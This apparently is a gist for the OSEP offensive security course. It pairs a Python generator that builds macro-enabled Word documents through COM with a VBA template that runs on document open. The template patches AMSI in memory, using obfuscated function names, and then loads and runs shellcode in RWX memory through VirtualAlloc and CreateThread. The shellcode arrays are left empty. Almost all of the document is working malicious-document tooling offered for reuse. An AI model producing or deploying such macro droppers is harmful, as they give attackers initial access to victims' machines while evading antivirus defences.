[OSEP] Word Macro Generator
| The template.vba file included is quite literally https://github.com/Octoberfest7/OSEP-Tools/blob/main/WordMacroRunner, but without the AV-sandbox detection. |
| # I think this package is included in many of the tools we'd use? If not, pip install pywin32 | |
| import win32com.client as win32 | |
| # Grabs the contents of template.vba, and puts those in your Word document. The template in this gist contains an AMSI-bypass shellcode runner (because OSEP), but put whatever you want in there go nuts. | |
| macro_code = open("template.vba", "r").read() | |
| # Alright, this requires some settings changes in Word, as it does some COM-communication. | |
| # In Word, go to File -> Options -> Trust Center -> Trust Center Settings... -> Macro Settings -> Enable "Trust access to the VBA project object model" | |
| # Save and exit, should work fine. | |
| word = win32.Dispatch("Word.Application") | |
| word.Visible = False | |
| doc = word.Documents.Add() | |
| selection = word.Selection | |
| # The contents of your Word document | |
| selection.TypeText("Test!") | |
| vb_project = doc.VBProject | |
| vb_components = vb_project.VBComponents | |
| module = vb_components.Add(1) | |
| module.CodeModule.AddFromString(macro_code) | |
| # You'd probably want to change this | |
| output_path = r"Tools\\Payloads\\example.doc" | |
| # File format 13 is apparently a Macro-enabled Word document. | |
| doc.SaveAs(output_path, FileFormat=13) | |
| doc.Close(False) | |
| word.Quit() |
| Type MODULEINFO | |
| lpBaseOfDLL As Long | |
| SizeOfImage As Long | |
| EntryPoint As Long | |
| End Type | |
| Private Declare PtrSafe Function Sleep Lib "KERNEL32" (ByVal mili As Long) As Long | |
| Private Declare PtrSafe Function CreateThread Lib "KERNEL32" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr | |
| Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr | |
| Private Declare PtrSafe Function GetPrAddr Lib "KERNEL32" Alias "GetProcAddress" (ByVal hModule As LongPtr, ByVal lpProcName As String) As LongPtr | |
| Private Declare PtrSafe Function VirtPro Lib "KERNEL32" Alias "VirtualProtect" (lpAddress As Any, ByVal dwSize As LongPtr, ByVal flNewProcess As LongPtr, lpflOldProtect As LongPtr) As LongPtr | |
| Private Declare PtrSafe Function getmod Lib "KERNEL32" Alias "GetModuleHandleA" (ByVal lpLibFileName As String) As LongPtr | |
| Private Declare PtrSafe Sub patched Lib "KERNEL32" Alias "RtlFillMemory" (Destination As Any, ByVal Length As Long, ByVal Fill As Byte) | |
| Public Declare PtrSafe Function EnumProcessModulesEx Lib "psapi.dll" (ByVal hProcess As LongPtr, lphModule As LongPtr, ByVal cb As LongPtr, lpcbNeeded As LongPtr, ByVal dwFilterFlag As LongPtr) As LongPtr | |
| Public Declare PtrSafe Function GetModuleBaseName Lib "psapi.dll" Alias "GetModuleBaseNameA" (ByVal hProcess As LongPtr, ByVal hModule As LongPtr, ByVal lpFileName As String, ByVal nSize As LongPtr) As LongPtr | |
| Function MyMacro() | |
| Dim Is64 As Boolean | |
| Dim StrFile As String | |
| Dim check As Boolean | |
| Dim buf As Variant | |
| Dim addr As LongPtr | |
| Dim counter As LongPtr | |
| Dim data As String | |
| Dim res As LongPtr | |
| Dim ipcheck As Boolean | |
| ipcheck = False | |
| Dim inscope As String | |
| inscope = "192.168.*" | |
| ipcheck = getMyIP(inscope) | |
| StrFile = Dir("c:\windows\system32\a?s?.d*") | |
| Is64 = arch() | |
| check = Tru | |
| If check Then | |
| patch StrFile, Is64 | |
| End If | |
| If Is64 Then | |
| buf = Array() | |
| Else | |
| buf = Array() | |
| End If | |
| addr = VirtualAlloc(0, UBound(buf), &H3000, &H40) | |
| For counter = LBound(buf) To UBound(buf) | |
| data = Hex(buf(counter)) | |
| patched ByVal (addr + counter), 1, ByVal ("&H" & data) | |
| Next counter | |
| res = CreateThread(0, 0, addr, 0, 0, 0) | |
| End Function | |
| Function arch() As Boolean | |
| #If Win64 Then | |
| arch = True | |
| #Else | |
| arch = False | |
| #End If | |
| End Function | |
| Public Function getMyIP(ipcheck As String) As Boolean | |
| Dim objWMI As Object | |
| Dim objQuery As Object | |
| Dim objQueryItem As Object | |
| Dim vIpAddress | |
| Dim counter As Integer | |
| Dim ips() As String | |
| Set objWMI = GetObject("winmgmts:\\.\root\cimv2") | |
| Set objQuery = objWMI.ExecQuery("Select * from Win32_NetworkAdapterConfiguration Where IPEnabled = True") | |
| For Each objQueryItem In objQuery | |
| For Each vIpAddress In objQueryItem.ipaddress | |
| If CStr(vIpAddress) Like ipcheck Then | |
| getMyIP = True | |
| End If | |
| Next | |
| Next | |
| End Function | |
| Function amcheck(StrFile As String) As Boolean | |
| Dim szProcessName As String | |
| Dim mdi As MODULEINFO | |
| Dim hMod(0 To 1023) As LongPtr | |
| Dim res As LongPtr | |
| amcheck = False | |
| res = EnumProcessModulesEx(-1, hMod(0), 1024, cbNeeded, &H3) | |
| For i = 0 To UBound(hMod) | |
| szProcessName = String$(50, 0) | |
| GetModuleBaseName -1, hMod(i), szProcessName, Len(szProcessName) | |
| If Left(szProcessName, 8) = StrFile Then | |
| amcheck = True | |
| End If | |
| Next i | |
| End Function | |
| Function patch(StrFile As String, Is64 As Boolean) | |
| Dim lib As LongPtr | |
| Dim Func_addr As LongPtr | |
| Dim temp As LongPtr | |
| Dim old As LongPtr | |
| Dim off As Integer | |
| lib = getmod(StrFile) | |
| If Is64 Then | |
| off = 96 | |
| Else | |
| off = 80 | |
| End If | |
| Func_addr = GetPrAddr(lib, "Am" & Chr(115) & Chr(105) & "U" & Chr(97) & "c" & "Init" & Chr(105) & Chr(97) & "lize") - off | |
| temp = VirtPro(ByVal Func_addr, 32, 64, 0) | |
| patched ByVal (Func_addr), 1, ByVal ("&H" & "90") | |
| patched ByVal (Func_addr + 1), 1, ByVal ("&H" & "C3") | |
| temp = VirtPro(ByVal Func_addr, 32, old, 0) | |
| If Is64 Then | |
| off = 352 | |
| Else | |
| off = 256 | |
| End If | |
| Func_addr = GetPrAddr(lib, "Am" & Chr(115) & Chr(105) & "U" & Chr(97) & "c" & "Init" & Chr(105) & Chr(97) & "lize") - off | |
| temp = VirtPro(ByVal Func_addr, 32, 64, old) | |
| patched ByVal (Func_addr), 1, ByVal ("&H" & "90") | |
| patched ByVal (Func_addr + 1), 1, ByVal ("&H" & "C3") | |
| temp = VirtPro(ByVal Func_addr, 32, old, 0) | |
| End Function | |
| Sub AutoOpen() | |
| MyMacro | |
| End Sub |